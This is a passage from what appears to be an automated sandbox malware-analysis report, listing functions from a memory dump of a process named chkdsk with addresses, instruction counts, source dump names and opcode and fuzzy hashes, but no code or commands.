                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cb216d517741f17c64281b3bc631b55a9930c6ee5ee811df225927d51916adcf
                                                                                                                    • Instruction ID: 8fe7b6c404a67d78eb25fb4547eb4c2bf64c1c8c9e851ba9f89a67dced5fac0e
                                                                                                                    • Opcode Fuzzy Hash: cb216d517741f17c64281b3bc631b55a9930c6ee5ee811df225927d51916adcf
                                                                                                                    • Instruction Fuzzy Hash: 642180726197469BCB21DE58C880F6B7BE5FB88718F054519FC49EB351E730ED018BA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588D450 Relevance: .1, Instructions: 85COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0999623d461498ede04f1a69a1ee0b8794be2e29ee93ab6bb2930c5b9b42c4b3
                                                                                                                    • Instruction ID: 14d1d7791c285410c4e85bed11f5d84f5baa2bef8067cb631522e5e7fb2dea7d
                                                                                                                    • Opcode Fuzzy Hash: 0999623d461498ede04f1a69a1ee0b8794be2e29ee93ab6bb2930c5b9b42c4b3
                                                                                                                    • Instruction Fuzzy Hash: 7121B1B66453009BD721FB28D948F6A7BE9EB45618F00086ABD06D7290DB30DD05CFA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05853536 Relevance: .1, Instructions: 84COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1ec60ddd1814b6edd6b9575b5be91705671e288441c0e5200b92ef3a87bca01e
                                                                                                                    • Instruction ID: 5c7be2dee2a51e7df21e6fc0c1bf6c2ebd799d9c120a1f7cf244f3bd389a85f4
                                                                                                                    • Opcode Fuzzy Hash: 1ec60ddd1814b6edd6b9575b5be91705671e288441c0e5200b92ef3a87bca01e
                                                                                                                    • Instruction Fuzzy Hash: 1E21CE312457409FCB21AF08C948F2ABBE2FF81B65F45195DEC428B651CEB0EC48DB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05889580 Relevance: .1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 44eb7c1db8227a11802030a5ad0427353ffd0fe742a4520a0752c1356ca3c743
                                                                                                                    • Instruction ID: 5fa648ab806c76509abde974b1b8292958c59c2876b99297d6de0ee6aceaff3e
                                                                                                                    • Opcode Fuzzy Hash: 44eb7c1db8227a11802030a5ad0427353ffd0fe742a4520a0752c1356ca3c743
                                                                                                                    • Instruction Fuzzy Hash: 7E21A1702047049BCF35BA29D854F367BA3FF41224F100659ED57C6690EB35FD498A92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0592B781 Relevance: .1, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a3c39dd6944953247ee204d8f612c7af090a4196ad8969f265835e8ab8fb6899
                                                                                                                    • Instruction ID: d999f6faf2da660a72bac2fba5e5cff1cf98faf67e772173d21b6c87ece2a758
                                                                                                                    • Opcode Fuzzy Hash: a3c39dd6944953247ee204d8f612c7af090a4196ad8969f265835e8ab8fb6899
                                                                                                                    • Instruction Fuzzy Hash: 9B21D036A00265EFDB218F59C888F6ABBFAFF45750F058464E818DBA04D338DD00CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05872755 Relevance: .1, Instructions: 73COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 20f215840b8cbd0bb1ba4f2d6336190fbfb4e3d2f08906ccc02cd44022481889
                                                                                                                    • Instruction ID: 2649b9f88f92815bd51ff0abe6f84d2de7a44dc68f16366c6717b1dd142fbb6d
                                                                                                                    • Opcode Fuzzy Hash: 20f215840b8cbd0bb1ba4f2d6336190fbfb4e3d2f08906ccc02cd44022481889
                                                                                                                    • Instruction Fuzzy Hash: 1B21C2357497849BF326972C8D58F24779ABB45BB4F2806A0ED32DB7D2DBA8DC008211
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D05C6 Relevance: .1, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5aa25ff30f8c3e100e568ad0ee0d56363daaf0a07ac2823a6ed61f3af293f990
                                                                                                                    • Instruction ID: 4ce146d1bb857ec02ee5b8a68c6e2d51fafb1a99f2758773deeeb1c6803d1410
                                                                                                                    • Opcode Fuzzy Hash: 5aa25ff30f8c3e100e568ad0ee0d56363daaf0a07ac2823a6ed61f3af293f990
                                                                                                                    • Instruction Fuzzy Hash: 3E21D6B1E103089BCB10DFAAD9859AEFBF8BB98710F10412AE905E7251D6719D41CFA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058714C9 Relevance: .1, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                    • Instruction ID: 71288ff3c8b7422b10ada2abdf03eecc37ebef5c8e53f59b3440b31a0d3dcf02
                                                                                                                    • Opcode Fuzzy Hash: 6e00257dc14b4a21706c11d80b94c86bd4fe7158da46d6ffa4b94db1d511f37e
                                                                                                                    • Instruction Fuzzy Hash: 1D21D131605688DBEB2ACBA9C948F6577EEBF44B44F1904A0EC01CBB92E7B5DC80C751
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584B705 Relevance: .1, Instructions: 69COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 9de2264d5ed7ce653a37d5426389f40523bf0457ed327e31008ad1de3c1e9c98
                                                                                                                    • Instruction ID: 98a3b685926d774a276b64c8e9a8e78a945f55c830196edddb48f64cfd5c6a38
                                                                                                                    • Opcode Fuzzy Hash: 9de2264d5ed7ce653a37d5426389f40523bf0457ed327e31008ad1de3c1e9c98
                                                                                                                    • Instruction Fuzzy Hash: A3212EB2241B00DFCB26EF58C945F5AB7F5FB08709F144968E806C66A1CB34EC01CB49
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05858690 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d247eb4cf432e96fa07ca3eab8020eb706a98f631bf54cb0b925dcae7ffa8181
                                                                                                                    • Instruction ID: 4009e2c46f8807ca1078386980cf55702d4ed77efb97674ef9bb52c26b80a776
                                                                                                                    • Opcode Fuzzy Hash: d247eb4cf432e96fa07ca3eab8020eb706a98f631bf54cb0b925dcae7ffa8181
                                                                                                                    • Instruction Fuzzy Hash: 1511B275701615DBCB11CF58C480A6ABBE5BF4A760728406AED0AEF304D7B2ED018F90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05880044 Relevance: .1, Instructions: 68COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
                                                                                                                    • Instruction ID: 75134744dc0331146f411457394c94c133ca892e7f6373e3850887744fb559ac
                                                                                                                    • Opcode Fuzzy Hash: 890f1da43df6bf821c9fa0e63626150f351daea58c3e7afc6d4a7f240fe17a3e
                                                                                                                    • Instruction Fuzzy Hash: 5D119073600704EFD722AB58D849FAEBBA9EB84764F10402AEE01DF150E671ED49CB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05853640 Relevance: .1, Instructions: 67COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2c52f34c78957e882e8d8c040246bf8eefc1116ff6a67b64cbefa45fa35a402f
                                                                                                                    • Instruction ID: 58d9fa76871d4156f8ba2f6c51f9678d3b6c02370bb6778f2018437f48d84118
                                                                                                                    • Opcode Fuzzy Hash: 2c52f34c78957e882e8d8c040246bf8eefc1116ff6a67b64cbefa45fa35a402f
                                                                                                                    • Instruction Fuzzy Hash: 4721B071A043098AEB15DF6DD458BEEB6E4BB88328F19841CDC12972D0CFB89D49DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05858009 Relevance: .1, Instructions: 66COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a674b3cfcd1d3c275bcac2799cec1dec29d7073846a98226b733ffefe0022f87
                                                                                                                    • Instruction ID: 07939a0ea664bdea38ff75d7e7d36be6d8fa0a8c0a7c045a13776d792e52dc93
                                                                                                                    • Opcode Fuzzy Hash: a674b3cfcd1d3c275bcac2799cec1dec29d7073846a98226b733ffefe0022f87
                                                                                                                    • Instruction Fuzzy Hash: 83214C75A00209DFCB14CF58C581A6EBBB6FB48728F30416ED905A7350CB71AD06CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0588666D Relevance: .1, Instructions: 65COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cafb8e88121d43d67bd13711c0a9f54df5f7aa78f6cad4bbfbacfa05a18ca49
                                                                                                                    • Instruction ID: 4790240b193dc6d91a2e1a7f0bd0d3b4fb05ae3e99cf00870ee4b8665279f860
                                                                                                                    • Opcode Fuzzy Hash: 9cafb8e88121d43d67bd13711c0a9f54df5f7aa78f6cad4bbfbacfa05a18ca49
                                                                                                                    • Instruction Fuzzy Hash: F7215871604B41EFC720EB69C881F76B7E9FB44654F40882DE99AD7250EB30AC40CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058491F0 Relevance: .1, Instructions: 64COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2718b26d0d8b842006c88771b3a8e542ab9acd8ebc30e6ad4ea3981a7a75fd2f
                                                                                                                    • Instruction ID: d34a9063e93c19d524032957d5153ba5e9ea307214c933c49e9fd0d3c399bb19
                                                                                                                    • Opcode Fuzzy Hash: 2718b26d0d8b842006c88771b3a8e542ab9acd8ebc30e6ad4ea3981a7a75fd2f
                                                                                                                    • Instruction Fuzzy Hash: D911D07F129640ABD328AF65EA42E767BE8EB99A80F240425FC00D7350EB34CD41CB64
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058E6400 Relevance: .1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b946679ffe604d9eacfd10321252821200d5ed818edeb237005a18f76967d4a
                                                                                                                    • Instruction ID: e0c86a2ed6f84b5c9bebad2aa82684e54ecc15e43ad0ca0566db51a3634c7dc4
                                                                                                                    • Opcode Fuzzy Hash: 9b946679ffe604d9eacfd10321252821200d5ed818edeb237005a18f76967d4a
                                                                                                                    • Instruction Fuzzy Hash: BA11C132380605EBC722CB9EE944F5A77B9EF6A768F014024FA06DB250EA70EC00C790
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587E7E0 Relevance: .1, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 38a69e5c26144befc8186cffcf3f232c596651ddede2caf6ec891ae8ad1e8732
                                                                                                                    • Instruction ID: cfd7ec08e85af571f90f1119aa44074ef62f56f9b54f34e00376a99e939d1c54
                                                                                                                    • Opcode Fuzzy Hash: 38a69e5c26144befc8186cffcf3f232c596651ddede2caf6ec891ae8ad1e8732
                                                                                                                    • Instruction Fuzzy Hash: A811E5B27002049BDB19D728CC91E7B72AFEBC5774B294569E922CB390D970DC42C691
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058865D0 Relevance: .1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ad7d63bdeb25905609d1dfc08222cb19b4819269a5ec8f9b76beafd7bbe2469
                                                                                                                    • Instruction ID: 983f36cfa7d7182c267cf977c58e7e58699da97aa20963a11efa9536f6379def
                                                                                                                    • Opcode Fuzzy Hash: 4ad7d63bdeb25905609d1dfc08222cb19b4819269a5ec8f9b76beafd7bbe2469
                                                                                                                    • Instruction Fuzzy Hash: FD116DB6A012859BCB24EF5AC584F6ABBA5EFA4650B054069EC06DB310EB30DD00CB94
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0591A464 Relevance: .1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
                                                                                                                    • Instruction ID: 94153fb9a1e82c02955cb83165635185b6225afab9b7765f43a2ec326eb87139
                                                                                                                    • Opcode Fuzzy Hash: 17b7fd83732ac97bf948158935cefa8ce054b86e1e540677a9e9fc5c72766afe
                                                                                                                    • Instruction Fuzzy Hash: 2B11C432600529AFDB19CF58C819B9DB7B5EF84210F048269EC5697380EA75BD51CBD4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0587270D Relevance: .1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 60cd4a89aea77d1b0bc519060ac1e3bd580054a7cd6cb54612f30812c2a093ca
                                                                                                                    • Instruction ID: 97767f1dca458118ef86c8c0f8239bd4fb1e5a063d872397d504f65cf4438369
                                                                                                                    • Opcode Fuzzy Hash: 60cd4a89aea77d1b0bc519060ac1e3bd580054a7cd6cb54612f30812c2a093ca
                                                                                                                    • Instruction Fuzzy Hash: 010126793492489BF32996AE8998F777BDEEF80294F1900A1FC02CB251DA64DC008232
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058CD69D Relevance: .1, Instructions: 58COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                                                    • Instruction ID: 773dc1c59245d063fd737cc5a6d2bc7e03ddd1f6a96380829fd00340a2028609
                                                                                                                    • Opcode Fuzzy Hash: 344a7ebce17cc95804a4fe4266c3854e038087be8121a2260c2918af3b52c5a9
                                                                                                                    • Instruction Fuzzy Hash: 40110E72600208BFCB05AF6C98808BEBBB9EF89304F1080AAFC44CB250CA31CD44C7A5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058545B0 Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: edfb47004c6583a48f32d0dbc7c2b84ee0caa2b2bf921b44da5e53b1b2f90c55
                                                                                                                    • Instruction ID: a420efb6ad1948951e1e0c0b2ffec711d72532dc4e4fab80da5ceca35d385988
                                                                                                                    • Opcode Fuzzy Hash: edfb47004c6583a48f32d0dbc7c2b84ee0caa2b2bf921b44da5e53b1b2f90c55
                                                                                                                    • Instruction Fuzzy Hash: 69118C72604794AFEF21CE69D844F567BE9EB84A74F004115FC05CB2A0C774EC84CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 05886540 Relevance: .1, Instructions: 56COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
